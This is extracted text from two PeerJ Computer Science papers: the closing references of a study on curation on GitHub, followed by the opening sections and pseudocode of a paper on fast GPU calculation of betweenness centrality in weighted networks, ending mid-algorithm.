reagents/ma- terials/analysis tools, wrote the paper, reviewed drafts of the paper, suggested relevant works and possible framing. • John M. Carroll conceived and designed the experiments, contributed reagents/materi- als/analysis tools, wrote the paper, reviewed drafts of the paper, guided and oversaw the entire process. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The study was approved by Penn State University Institutional Review Board. Data Availability The following information was supplied regarding data availability: The interview transcripts have been uploaded as Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.134#supplemental-information. REFERENCES Bamforth DB. 1986. Technological efficiency and tool curation. American Antiquity 51:38–50. Burt RS. 2004. Structural holes and good ideas. American Journal of Sociology 110(2):349–399 DOI 10.1086/421787. Burt RS. 2005. Brokerage and closure: an introduction to social capital. Oxford: Oxford University Press. Carroll JM. 2012. The neighborhood in the internet: design research projects in community informatics. New York: Routledge. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 18/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134#supplemental-information http://dx.doi.org/10.7717/peerj-cs.134#supplemental-information http://dx.doi.org/10.7717/peerj-cs.134#supplemental-information http://dx.doi.org/10.1086/421787 http://dx.doi.org/10.7717/peerj-cs.134 Dabbish L, Stuart C, Tsay J, Herbsleb J. 2012. Social coding in GitHub: transparency and collaboration in an open software repository. In: Proceedings of the 2012 conference on computer supported cooperative work. New York: ACM, 1277–1286. Dabbish L, Stuart C, Tsay J, Herbsleb J. 2013. Leveraging transparency. IEEE Software 30(1):37–43 DOI 10.1109/MS.2012.172. Doll B. 2013. 10 million repositories. Available at https://github.com/blog/1724-10- million-repositories (accessed on 28 December 2015). Duh K, Hirao T, Kimura A, Ishiguro K, Iwata T, Yeung C-MA. 2012. Creating stories: social curation of twitter messages. In: Proc. ICWSM 2012. Farooq U, Kannampallil TG, Song Y, Ganoe CH, Carroll JM, Giles L. 2007. Evaluating tagging behavior in social bookmarking systems: metrics and design heuristics. In: Proceedings of the 2007 international ACM conference on supporting group work. New York: ACM, 351–360. Golder SA, Huberman BA. 2006. Usage patterns of collaborative tagging systems. Journal of Information Science 32(2):198–208 DOI 10.1177/0165551506062337. Greene D, Reid F, Sheridan G, Cunningham P. 2011. Supporting the curation of twitter user lists. ArXiv preprint. arXiv:1110.1349. Guba EG. 1981. Criteria for assessing the trustworthiness of naturalistic inquiries. Educational Communication and Technology Journal 29:75–91. Hars A, Ou S. 2001. Working for free? Motivations of participating in open source projects. In: Proceedings of the 34th annual Hawaii international conference on system science. Piscataway: IEEE. Higgins S. 2011. Digital curation: the emergence of a new discipline. International Journal of Digital Curation 6(2):78–88 DOI 10.2218/ijdc.v6i2.191. Hoepfl MC. 1997. Choosing qualitative research: a primer for technology education researchers. Journal of Technology Education 9(1):47–63 DOI 10.21061/jte.v9i1.a.4. Jenkins H, Purushotma R, Weigel M, Clinton K, Robison AJ. 2009. Confronting the challenges of participatory culture: media education for the 21st century. Cambridge: MIT Press. Lacey A, Luff D. 2001. Qualitative data analysis. Sheffield: Trent focus. Lakhani K, Wolf RG. 2003. Why hackers do what they do: understanding motivation and effort in free/open source software projects. MIT Sloan working paper no. 4425-03. Cambridge: MIT. Lave J, Wenger E. 1991. Situated learning: legitimate peripheral participation. Cambridge: Cambridge University Press. Lincoln YS, Guba EG. 1985. Naturalistic inquiry. Beverly Hills: Sage Publications, Inc. Marlow J, Dabbish L, Herbsleb J. 2013. Impression formation in online peer production: activity traces and personal profiles in GitHub. In: Proceedings of the 2013 conference on computer supported cooperative work. New York: ACM, 117–128. Marlow C, Naaman M, Boyd D, Davis M. 2006. HT06, tagging paper, taxonomy, Flickr, academic article, to read. In: Proceedings of the 7th conference on hypertext and hypermedia. New York: ACM, 31–40. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 19/20 https://peerj.com http://dx.doi.org/10.1109/MS.2012.172 https://github.com/blog/1724-10-million-repositories https://github.com/blog/1724-10-million-repositories http://dx.doi.org/10.1177/0165551506062337 http://arXiv.org/abs/1110.1349 http://dx.doi.org/10.2218/ijdc.v6i2.191 http://dx.doi.org/10.21061/jte.v9i1.a.4 http://dx.doi.org/10.7717/peerj-cs.134 Marshall MN. 1996. Sampling for qualitative research. Family Practice 13(6):522–526 DOI 10.1093/fampra/13.6.522. Matthews T, Whittaker S, Badenes H, Smith B. 2014. Beyond end user content to collaborative knowledge mapping: interrelations among community social tools. In: Proceedings of the 17th conference on computer supported cooperative work & social computing. New York: ACM, 900–910. McDonald N, Goggins S. 2013. Performance and participation in open source software on GitHub. In: CHI’13 extended abstracts on human factors in computing systems. New York: ACM, 139–144. Singer L, Figueira Filho F, Cleary B, Treude C, Storey M-A, Schneider K. 2013. Mutual assessment in the social programmer ecosystem: an empirical investigation of developer profile aggregators. In: Proceedings of the 2013 conference on computer supported cooperative work. New York: ACM, 103–116. Singer P, Flöck F, Meinhart C, Zeitfogel E, Strohmaier M. 2014. Evolution of reddit: from the front page of the internet to a self-referential community? In: Proceedings of the 23rd international conference on world wide web. New York: ACM, 517–522. Storey M-A, Singer L, Cleary B, Figueira Filho F, Zagalsky A. 2014. The (r) evolution of social media in software engineering. In: Proceedings of the future of software engineering. New York: ACM, 100–116. Strauss AL. 1987. Qualitative analysis for social scientists. Cambridge: Cambridge University Press. Van Liere D. 2010. How far does a tweet travel?: information brokers in the twitterverse. In: Proceedings of the international workshop on modeling social media 2010. New York: ACM, 6:1–6:4. Wenger E. 1998. Communities of practice: learning, meaning, and identity. Cambridge: Cambridge University Press. Wenger EC, Snyder WM. 2000. Communities of practice: the organizational frontier. Harvard Business Review 78(1):139–146. Wu Y, Kropcznyski J, Prates R, Carroll JM. 2015. The rise of curation on GitHub. In: Third AAAI conference on human computation and crowdsourcing 2015. Wu Y, Kropczynski J, Shih PC, Carroll JM. 2014. Exploring the ecosystem of software developers on GitHub and other platforms. In: Proceedings of the companion publication of the 17th conference on computer supported cooperative work & social computing. New York: ACM, 265–268. Ye Y, Kishida K. 2003. Toward an understanding of the motivation of open source software developers. In: Proceedings of the 25th international conference on software engineering. Piscataway: IEEE, 419–429. Zhong C, Shah S, Sundaravadivelan K, Sastry N. 2013. Sharing the loves: understanding the how and why of online content curation. In: Proceedings of the seventh interna- tional AAAI Conference on weblogs and social media. 659–667. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 20/20 https://peerj.com http://dx.doi.org/10.1093/fampra/13.6.522 http://dx.doi.org/10.7717/peerj-cs.134 work_uz5h6qoj2bhtlc5p3xsqkevrpq ---- A GPU-based solution for fast calculation of the betweenness centrality in large weighted networks A GPU-based solution for fast calculation of the betweenness centrality in large weighted networks Rui Fan1, Ke Xu1 and Jichang Zhao2 1 State Key Laboratory of Software Development Environment, Beihang University, Beijing, PR China 2 School of Economics and Management, Beihang University, Beijing, PR China ABSTRACT Betweenness, a widely employed centrality measure in network science, is a decent proxy for investigating network loads and rankings. However, its extremely high computational cost greatly hinders its applicability in large networks. Although several parallel algorithms have been presented to reduce its calculation cost for unweighted networks, a fast solution for weighted networks, which are commonly encountered in many realistic applications, is still lacking. In this study, we develop an efficient parallel GPU-based approach to boost the calculation of the betweenness centrality (BC) for large weighted networks. We parallelize the traditional Dijkstra algorithm by selecting more than one frontier vertex each time and then inspecting the frontier vertices simultaneously. By combining the parallel SSSP algorithm with the parallel BC framework, our GPU-based betweenness algorithm achieves much better performance than its CPU counterparts. Moreover, to further improve performance, we integrate the work-efficient strategy, and to address the load- imbalance problem, we introduce a warp-centric technique, which assigns many threads rather than one to a single frontier vertex. Experiments on both realistic and synthetic networks demonstrate the efficiency of our solution, which achieves 2.9� to 8.44� speedups over the parallel CPU implementation. Our algorithm is open-source and free to the community; it is publicly available through https://dx.doi.org/10.6084/m9.figshare.4542405. Considering the pervasive deployment and declining price of GPUs in personal computers and servers, our solution will offer unprecedented opportunities for exploring betweenness-related problems and will motivate follow-up efforts in network science. Subjects Distributed and Parallel Computing, Network Science and Online Social Networks Keywords Parallel computing, GPU computing, Betweenness centrality, Weighted networks INTRODUCTION As an emerging multidisciplinary research area, network science has attracted much attention from researchers of various backgrounds, such as computer science, biology and physics, in recent decades. In these contributions, the betweenness centrality (BC) is often applied as a critical metric for measuring the significance of nodes or edges (Ma & Sayama, 2015; Freeman, 1977; Barthélemy, 2004; Abedi & Gheisari, 2015; Goh et al., 2003). For example, Girvan and Newman developed a community detection algorithm based on edge BC (Girvan & Newman, 2002), Leydesdorff (2007) used centrality as an indicator of the interdisciplinarity of scientific journals and Motter & Lai (2002) established a model How to cite this article Fan et al. (2017), A GPU-based solution for fast calculation of the betweenness centrality in large weighted networks. PeerJ Comput. Sci. 3:e140; DOI 10.7717/peerj-cs.140 Submitted 10 August 2017 Accepted 11 November 2017 Published 4 December 2017 Corresponding author Jichang Zhao, jichang@buaa.edu.cn Academic editor John Owens Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.140 Copyright 2017 Fan et al. Distributed under Creative Commons CC-BY 4.0 https://dx.doi.org/10.6084/m9.figshare.4542405 http://dx.doi.org/10.7717/peerj-cs.140 mailto:jichang@�buaa.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.140 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ of cascading failures in which the load on a node is represented by its betweenness. However, the extremely high temporal and spatial complexity of the BC calculation greatly limits its applicability in large networks. Before the landmark work of Brandes (2001), the complexity of the algorithm for computing the BC was O(n 3 ) in time and O(n 2 ) in space. Brandes (2001) reduced the complexity to O(n + m) in space and O(nm) and O(nm + n 2 log n) in time for unweighted and weighted networks, respectively, where n is the number of vertices and m is the number of edges. However, this improved algorithm still cannot satisfy the requirements for scientific computations in the present era of information explosion, as an increasing number of unexpectedly large networks emerge, such as online social networks, gene networks and collaboration networks. For example, Twitter has hundreds of millions of active users, who form an enormous online social network. However, calculating the BC of a weighted network with one million nodes may take approximately one year, which is an unsupportable time cost. Existing parallel CPU algorithms may reduce this time to several months; however, this is still too expensive. Because of this problem, there is a pressing need to develop faster BC algorithms for the exploration of diverse domains. General-purpose GPU (GPGPU) computing, which has high parallelization, provides an opportunity to employ parallel algorithms implemented on GPUs to achieve better performance. For network-related problems, researchers have devoted efforts to conquering irregular graph structures using GPGPU techniques and have achieved higher performance than is possible with traditional sequential CPU algorithms (Mitchell & Frank, 2017; Merrill, Garland & Grimshaw, 2015; Wang et al., 2015; Harish & Narayanan, 2007; Cong & Bader, 2005). CUDA, developed by Nvidia Corporation, is the most popular GPU computing framework, and some researchers have even used this framework to parallelize the Brandes algorithm (Shi & Zhang, 2011; Sariyüce et al., 2013; McLaughlin & Bader, 2014, 2015). However, previous works have concentrated on unweighted networks for simplicity, although to the best of our knowledge, many realistic networks are weighted ones. The most significant difference in the BC algorithm between unweighted and weighted networks is the shortest-path calculation. In weighted networks, the Dijkstra algorithm should be used to solve the single-source shortest path (SSSP) problem rather than the breadth-first search (BFS) algorithm. In previous work, many efforts have been devoted to developing a GPU version of the SSSP problem using the well-known Dijkstra algorithm (Martin, Torres & Gavilanes, 2009; Ortega-Arranz et al., 2013; Delling et al., 2011; Davidson et al., 2014). Although such algorithms have been successfully developed and presented, establishing a parallel version of the BC algorithm for weighted networks is nontrivial because the original SSSP algorithm must be modified in many critical aspects for this task, and to the best of our knowledge, a suitable fast solution is still lacking. With the aim of filling this vital gap, we propose a fast solution using CUDA for calculating the BC in large weighted networks based on previous GPU BC algorithms and SSSP algorithms. To make our algorithm more efficient, we make efforts to optimize it by employing several novel techniques to overcome the influence of irregular network structures. Real-world networks have many characteristics that can degrade the performance of Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 2/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ GPU parallelization algorithms. For example, the frontier set of nodes is always small compared with the total number of vertices, especially for networks with large diameters. At the same time, the majority of the nodes do not need to be inspected in each step; hence, processing all vertices simultaneously, as is done in traditional algorithms, is wasteful. McLaughlin & Bader (2014) proposed a work-efficient strategy to overcome this problem. Another well-known issue is that the power-law degree distribution in realistic networks induces severe load imbalance. Several methods have been proposed in previous studies to overcome this problem; e.g., Jia et al. (2011) employed an edge parallel strategy to avoid load imbalance, and Hong et al. (2011) addressed this problem by using a warp technique. In this paper, we systematically investigate the advantages and disadvantages of these previous methods and incorporate them into our algorithm to solve the above two problems. Experiments on both real-world and synthetic networks demonstrate that our algorithm significantly outperforms the baseline GPU algorithm. Our main contributions are as follows: � Based on previous GPU-based parallel SSSP and BC algorithms, we propose an efficient algorithm for calculating the BC for weighted networks, which achieves 2.9� to 8.44� speedups over the parallel CPU algorithm on realistic networks. � We compare the traditional node-parallel method with the work-efficient version and the warp-centric method. Experiments on realistic networks and synthetic networks demonstrate that the combination of these two strategies performs better than either the basic node-parallel method or the individual strategies; it achieves an average speedup of 2.34� over the baseline method on realistic networks. � We package our algorithm as a useful tool that can be used to calculate both node and edge BC on weighted networks. Researchers can apply this tool to quickly and conveniently calculate BC values for weighted networks, especially large networks. The source code is publicly available through https://dx.doi.org/10.6084/m9.figshare.4542405. BACKGROUND First, we briefly introduce the well-known Brandes algorithm and Dijkstra algorithm based on preliminary definitions of a network and the BC. Brandes algorithm A graph can be denoted by G(V, E), where V is the set of vertices and E is the set of edges. An edge can be denoted by (u, v, w), which means that there is a link of weight w connecting nodes u and v. If edge (u, v) exists, it can be traversed either from u to v or from v to u because we focus only on undirected graphs in this paper. For directed graphs, if only an edge (u, v) exists, then the algorithm will store only the edge (u, v) and will process only this edge when inspecting vertex u; it will ignore (v, u) when inspecting vertex v. Thus, our algorithm can easily be extended to directed graphs. A path P = (s, : : : , t) is defined as a sequence of vertices connected by edges, where s is the starting node and t is the ending node. The length of P is the sum of the weights of the edges contained in P. d(s, t) is the distance between s and t, which is the length of the shortest path Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 3/23 https://dx.doi.org/10.6084/m9.figshare.4542405 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ connecting s and t. sst denotes the number of shortest paths from s to t. In accordance with these definitions, we have d(s, s) = 0, sss = 1, d(s, t) = d(t, s) and sst = sts for an undirected graph. sst(v) denotes the number of shortest paths from s to t that include v. Based on these definitions, the BC can be defined as: CBðvÞ¼ X s 6¼v 6¼t2V �stðvÞ �st : (1) From the above definitions, the calculation of the BC can be naturally separated into the following two steps: 1. Compute d(s, t) and sst for all node pairs (s, t). 2. Sum all pair dependencies. Here, a pair dependency is defined as �stðvÞ¼ �stðvÞ�st . The time complexity of the first step is O(mn) or O(mn + n 2 log n) for an unweighted graph or a weighted graph, respectively; therefore, the bottleneck of this algorithm is the second step, which has a time complexity of O(n 3 ). Brandes developed a more efficient BC algorithm with a time complexity of O(mn) for unweighted graphs and O(mn + n 2 log n) for weighted graphs. The critical point is that the dependency of a node v for a source node s is �sðvÞ¼ P u:v2PsðuÞ �sv �su ð1þ �sðuÞÞ. By applying this equation, we can accumulate the dependencies after computing the distances and numbers of shortest paths only from the source vertex s to all other vertices, rather than after computing the shortest paths for all pairs. We can easily develop a parallel version of the Brandes algorithm for unweighted graphs because the graph is always traversed as a tree using the BFS algorithm. Given a source node s, the root of the tree is s, and the tree is produced using the BFS method in the first step. In the second step, dependencies related to the source node s are calculated from the leaves to the root of the tree, and nodes at the same level are isolated and have no influence on each other. As a result, the parallel version of the algorithm can simultaneously explore all nodes at the same level in both steps, thereby fundamentally accelerating the BC calculation. Dijkstra algorithm The Dijkstra algorithm (Dijkstra, 1959) and the Floyd–Warshall algorithm (Floyd, 1962) are commonly employed to solve shortest-path problems. The Dijkstra algorithm is more easily adaptable to the BC problem because the Brandes algorithm accumulates dependencies after computing SSSPs rather than after finding and storing the shortest paths for all pairs. The Dijkstra algorithm applies a greedy strategy to solve the SSSP problem. In this algorithm, the source node is s, and once the shortest path from s to another node u is found, u will be settled. As seen in Algorithm 1, all nodes in graph G are separated into two sets: the settled vertices and the unsettled vertices Q. An array D is used to store tentative distances from s to all nodes. Initially, Q stores all nodes, D(s) = 0, and D(u) = ∞ for all other nodes (lines 1–5). During iteration (lines 6–9), the node u with Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 4/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ the shortest tentative distance D[u] (denoted by Extract_Min(Q)) is selected and settled, which means that the shortest path to node u is found and D[u] is set to the corresponding value. Then, for each node v ∈ neighbors(u), if D[u] + w(u, v) < D[v], D[v] will be updated to D[u] + w(u, v). The above procedures, in which one node is settled and the tentative distances of its neighbors are then updated, are repeated until Q is empty, i.e., until all nodes in graph G have been settled. According to the above description, the Dijkstra algorithm has no parallel characteristics because it selects one frontier node in each iteration. However, this restriction can be loosened to allow several frontier vertices to be explored simultaneously, in a manner similar to the BFS parallel approach. RELATED WORK Graph traversal strategies For unweighted networks, the Brandes algorithm applies the traditional BFS strategy in the shortest-path step. The BFS algorithm produces a traversal tree, which can later be used in the dependency accumulation step. This behavior makes it easy to parallelize both steps of the unweighted BC algorithm; i.e., threads are assigned to all vertices in the graph, and if a vertex is in the frontier set, the relevant thread traverses all edges connected to that vertex. Jia et al. (2011) implemented their BC algorithm based on this node-parallel traversal strategy. However, this simple strategy induces a problem of load imbalance since the degrees of different vertices varies, especially in scale-free networks. Threads processing low-degree vertices must wait for threads processing high-degree vertices, which significantly slows down the calculation. Instead of assigning threads to all vertices, Jia et al. (2011) proposed an edge-parallel strategy in which threads are assigned to all edges and edges that are connected to frontier vertices are then inspected. This technique eliminates the load-imbalance problem. Jia et al. applied both coarse-grained and fine- grained parallelism. In a modern GPU, the kernel can employ multiple blocks, and each block contains multiple threads. In their program, the GPU employs multiple blocks, each of which focuses on one root vertex s (coarse-grained parallelism). The threads within each block work cooperatively to traverse the edges in both the SSSP step and the dependency accumulation step (fine-grained parallelism). As a result, in each block, Algorithm 1 Sequential Dijkstra Algorithm. 1: Q ) empty set 2: for v ∈ V do 3: D[v] ) ∞ 4: add v to Q 5: D[s] ) 0 6: while Q is not empty do 7: u ) Extract_Min(Q) 8: for v ∈ neighbors(u) do 9: D[v] ) D[u] + weightuv Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 5/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ the dependencies of all vertices related to s are covered. For a vertex w, the dependency for the root vertex s is denoted by �s[w]. Based on the Brandes algorithm, the betweenness of w can be calculated as P s 6¼w2V �s½w�. Work-efficient technique In the edge- and node-parallel strategies, threads are assigned to all vertices or edges, respectively, and the algorithm then checks whether the vertices and edges need to be inspected; this incurs a considerable unnecessary cost because the frontier nodes might be small in size, especially for graphs of large diameters. To address this problem, McLaughlin & Bader (2014, 2015) proposed an excellent work-efficient technique. In this method, a queue Qcurr that stores the frontier vertices is maintained, and threads are assigned only to vertices that are in Qcurr. In the BFS procedure, new frontier nodes are added to Qnext. After the BFS step, the vertices in Qnext are transferred to Qcurr, and Qnext becomes an empty queue. To implement this technique, it is necessary to know the lengths of both queues (Qcurr_len and Qnext_len) because Qcurr and Qnext are implemented using arrays in the GPU kernel code. For the parallel BC algorithm proposed in this paper, we develop a work-efficient version of the algorithm based on this idea. The issue of load-imbalance The work-efficient algorithm still suffers from the load-imbalance problem since it is based on the node-parallel strategy. In addition to the edge-parallel strategy, other techniques have also been developed to solve this problem (Davidson et al., 2014; Hong et al., 2011). Hong et al. proposed the warp-centric concept, in which a warp rather than a thread is allocated to each node. In the modern CUDA framework, a warp consists of 32 threads, which act as a single instruction multiple data (SIMD) unit. Because a group of threads is assigned to a single frontier vertex, each thread processes a subset of the edges connected to that vertex. As a result, each thread does less work for high-degree nodes, thereby greatly reducing the waiting time. Other techniques for addressing the load-imbalance problem include Cooperative Blocks, CTA + Warp + Scan and load-balanced partitioning (Davidson et al., 2014; Wang et al., 2016). These methods attempt to assign threads to edges that need to be inspected by means of the design of several novel data structures and algorithms, which ensure excellent within-block and interblock load balance. However, these techniques require blocks to work cooperatively; i.e., each block must process several vertices or edges. Our BC algorithm applies both coarse-grained and fine-grained approaches. For this reason, we apply the warp-centric technique in our algorithm to address the load-imbalance problem. Parallel SSSP algorithm To compute the BC on a weighted network, a parallel SSSP algorithm is applied in the shortest-path step. The Dijkstra algorithm, the traditional method of solving this problem, is inherently sequential because it selects a single frontier vertex in each iteration. The Bellman–Ford algorithm is easier to parallelize, but it suffers from rather low efficiency compared with the Dijkstra algorithm. Martin, Torres & Gavilanes (2009) Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 6/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ proposed a parallel Dijkstra algorithm, in which all vertices with the minimum tentative distance are inserted into the frontier set and the vertices in the frontier set are then processed simultaneously. Ortega-Arranz et al. (2013) implemented a more aggressive algorithm. They loosened the condition for selecting frontier nodes, resulting in more than one frontier node in each iteration, to achieve higher parallelism. d-Stepping is another frequently employed parallel SSSP algorithm, in which vertices are grouped into buckets and all vertices in a bucket are processed simultaneously. However, as described in Davidson et al. (2014), there are three main characteristics that make �-stepping difficult to implement efficiently on a GPU; e.g., it requires dynamic arrays, which are poorly supported in the CUDA framework. Because of this, we base our SSSP algorithm on the parallel Dijkstra algorithm. However, previous SSSP algorithms have focused only on the values of the shortest paths, neglecting the number of shortest paths, which is also necessary for the BC calculation. In this paper, we modify the parallel Dijkstra algorithm presented in Ortega-Arranz et al. (2013) to combine it smoothly with our BC algorithm for weighted graphs. GPU-BASED ALGORITHM Our GPU-based BC algorithm for weighted graphs applies both coarse-grained (in which one block processes one root vertex s) and fine-grained (in which all threads in a block compute the shortest paths and dependencies related to s) parallel strategies. In a block, the shortest paths and dependencies corresponding to the root vertex processed by that block are calculated using Brandes’s two-step framework. In the shortest-path step, we build a multi-level structure from root to leaves by relaxing the condition that a single frontier node is selected in each iteration and then calculating the distances and numbers of shortest paths for all selected frontier nodes simultaneously. In the dependency accumulation step, the multi-level structure built in the first step is re-employed to calculate the dependencies of the vertices from the leaves to the root of the multi-level structure. Calculations for vertices at the same level are performed simultaneously. Parallel BC algorithm In this section, we introduce the details of our GPU version of the BC algorithm for weighted graphs. First, we apply the compressed sparse row (CSR) format, which is widely used in graph algorithms, to store the input graph (Bell & Garland, 2009; Davidson et al., 2014). This format is space efficient because both a vertex and an edge consume one entry, and it is convenient for performing the traversal task on a GPU. Moreover, edges related to the same vertex are stored consecutively in memory, which makes the warp-centric technique more efficient. For the storage of weighted graphs, an additional array is required to store the weights of all edges. We apply both coarse-grained and fine-grained parallel strategies. The pseudo-code presented in this paper describes the parallel procedure for threads within a block. Algorithm 2 shows the initialization of the required variables. U and F represent the unsettled set and the frontier set, respectively. v is unsettled if U[v] = 1 and is a frontier Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 7/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ node if F[v] = 1. d represents the tentative distance, and s[v] is the number of shortest paths from s to v. d[v] stores the dependencies of v. lock stores locks for all nodes to avoid race conditions. If lock[v] = 1, changing neither s[v] nor d[v] is permitted (see the next section for details). Vertices at the same level are consecutively recorded in S, and the start (or end) point of each level in S is stored in ends. In other words, S and ends record the levels of traversal in the CSR format; they are used in the dependency accumulation step. As seen in Algorithm 3, in the dependency accumulation step, we obtain all nodes at the same level from S and ends and accumulate the dependencies of these nodes simultaneously. Note that in Algorithm 3, we assign threads only to nodes that need to be inspected rather than to all nodes, which enhances the efficiency of the algorithm by avoiding redundant threads. We update the dependencies of edges in line 12 of Algorithm 3 if edge betweenness is required. Parallel Dijkstra algorithm The parallel version of the BFS procedure that is applied in the BC algorithm for unweighted networks can be naturally adapted from the sequential version because vertices located on the same level in the BFS tree can be inspected simultaneously. Moreover, in the dependency accumulation step (step two), dependencies are calculated from low-level vertices (nodes with the greatest depths in the tree) to high-level vertices (nodes that are close to the source node), and calculations for nodes at the same level are again performed simultaneously. In the weighted version, a multi-level structure is similarly necessary in the dependency accumulation step to achieve parallelization. As seen in Fig. 1A, this structure should satisfy the condition ∀ u ∈ Pv, lu < lv, where li denotes Algorithm 2 BC: variable initialization. 1: for v ∈ V do in parallel 2: U[v] ) 1 3: F[v] ) 0 4: d[v] ) ∞ 5: s[v] ) 0 6: d[v] ) 0 7: lock[v] ) 0 8: ends[v] ) 0 9: S[v] ) 0 10: d[s] ) 0 11: s[s] ) 1 12: U[s] ) 0 13: F[s] ) 1 14: S[0] ) s; Slen ) 1 15: ends[0] ) 0; ends[1] ) 1; endslen ) 2 16: � 0 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 8/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ the level of node i in the multi-level structure and Pi represents the set of predecessors of vertex i. Previous high-performance parallel SSSP algorithms have calculated only the shortest-path values, neglecting the number of shortest paths and the level relationships. In this paper, we propose a variant of the parallel Dijkstra algorithm that produces both the number of shortest paths and the multi-level structure needed in our betweenness algorithm. In the sequential Dijkstra algorithm, the fact that one frontier node is selected in each iteration makes parallelization a difficult task. However, this restriction can be relaxed, which means that several nodes can be settled at once to form the frontier set, allowing them to be inspected simultaneously in the next step. Moreover, these settled nodes satisfy the level condition, and because of this, they form a new level to be inspected simultaneously in the dependency accumulation step. In this paper, we apply the method described in Ortega-Arranz et al. (2013). In this method, �node v = min(w(v, u): (v, u) ∈ E) is precomputed. Then, we define �i as �i ¼ min ðDðuÞþ�node uÞ : u 2 Uif g; (2) where D(u) is the tentative distance of node u and Ui is the set of unsettled nodes in iteration i. All nodes that satisfy the condition DðvÞ� �i (3) are settled and become frontier nodes. When the Dijkstra algorithm is applied in the BC calculation, the number of shortest paths should be counted, and predecessor relationships between vertices at the same level are not permitted; otherwise, the parallel Algorithm 3 BC: Dependency Accumulation. 1: depth ) endslen - 1 2: while depth > 0 do 3: start ) ends[depth - 1] 4: end ) ends[depth] - 1 5: for 0 � i � end - start do in parallel 6: w ) S[start + i] 7: dsw ) 0 8: for v ∈ neighbors(w) do 9: if d[v] = d[w] + weightwv then 10: c ) s [w]/s[v] ∗ (1 + d[v]) 11: dsw ) dsw + c 12: atomicAdd(edgeBC[w], c) 13: d[w] ) dsw 14: if w s s then 15: atomicAdd(BC[w], d[w]) 16: depth ) depth - 1 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 9/23 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ algorithm would result in incorrect dependencies. To this end, the above condition should be modified to DðvÞ < �i: (4) Figure 1B illustrates an example, in which the vertex v0 is the source node. If Eq. (3) were to be applied, v1 and v2 would become the frontier nodes after the inspection of v0 in the first iteration, and the number of shortest paths would be 1 for both v1 and v2. Then, v1 and v2 would be inspected simultaneously in the next step. If v2 were to be processed first, the number of shortest paths for v3 would be set to 1; however, the correct number of shortest paths for v3 is 2. This mistake arises from the overambitious condition defined in Eq. (3); v2 should not be settled after the first iteration. Although the distances for all nodes would be correct with Eq. (3), the numbers of shortest paths would be wrong. By contrast, Eq. (4) will lead to the correct number of shortest paths for v3 because only v1 will be settled after the first iteration. This condition appears on line 29 in Algorithm 4. By applying Eq. (4) in the SSSP step, we achieve the correct numbers of shortest paths and construct a multi-level structure by setting each set of frontier nodes as a new level. Algorithm 4 presents our parallel Dijkstra algorithm in detail. The tentative distance and number of shortest paths are calculated as shown in lines 2–13. For a frontier vertex v, the thread inspects all edges connected to v. For an edge (v, w), if it finds a shorter path from v, i.e., d[v] + weightvw < d[w], d[w] will be updated, and s[w] will be set to zero since the previous number of shortest paths is invalid. Then, if d[w] = d[v] + weightwv, the number of shortest paths for vertex w will be updated to s[w] + s[v] in accordance with the Brandes algorithm. In this way, both the value and number of shortest paths are calculated and stored. In this part of the calculation, a race condition problem may arise because multiple nodes in the frontier set may connect to the same node, as seen in Figure 1 (A) An example of a multi-level structure. It is built in the SSSP step and will later be used in the dependency accumulation step. Nodes at the same level are inspected simultaneously in both steps. (B) An example of the selection of a set of frontier nodes in which using Eq. (3) will cause the number of shortest paths calculated for v3 to be incorrect. (C) An example of a race condition. v1 and v2 are both frontier nodes in the same iteration, and both are connected to w. Full-size DOI: 10.7717/peerj-cs.140/fig-1 Fan et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.140 10/23 http://dx.doi.org/10.7717/peerj-cs.140/fig-1 http://dx.doi.org/10.7717/peerj-cs.140 https://peerj.com/computer-science/ Fig. 1C. In this example, both v1 and v2 are in the frontier set and are connected to w, which results in the classical race condition problem. The reason this is a problem is that two or more threads may attempt to modify d[w] or s[w] simultaneously. To avoid this, we define a lock for each node. The first thread to focus on w will be granted the lock, and other threads will not be permitted to change d[w] and �[w]. We also adopt an atomic operation atomicCAS and a variable needlock. For all threads, needlock is initially true (line 4), and the threads will enter the following iteration. If a thread is granted the lock for w, it will run the shortest-path procedure and then release the lock (line 12), and needlock = false will be assigned (line 13) to exit the loop. If another thread owns Algorithm 4 BC: shortest-path calculation using the Dijkstra algorithm. 1: while � < ∞ do 2: for v ∈ V and F[v] = 1 do in parallel 3: for w ∈ neighbors(v) do 4: needlock ) true 5: while needlock do 6: if 0 = atomicCAS(lock[w],0,1) then 7: if U[w] = 1 and d[v] + weightvw < d[w] then 8: d[w] ) d[v] + weightvw 9: s [w] ) 0 10: if d[w] = d[v] + weightvw then 11: s[w] ) s[w] + s[v] 12: atomicExch(lock + w,0) 13: needlock ) false 14: � ) ∞ 15: for v ∈ V do in parallel 16: if U[v] = 1 and d[v] < 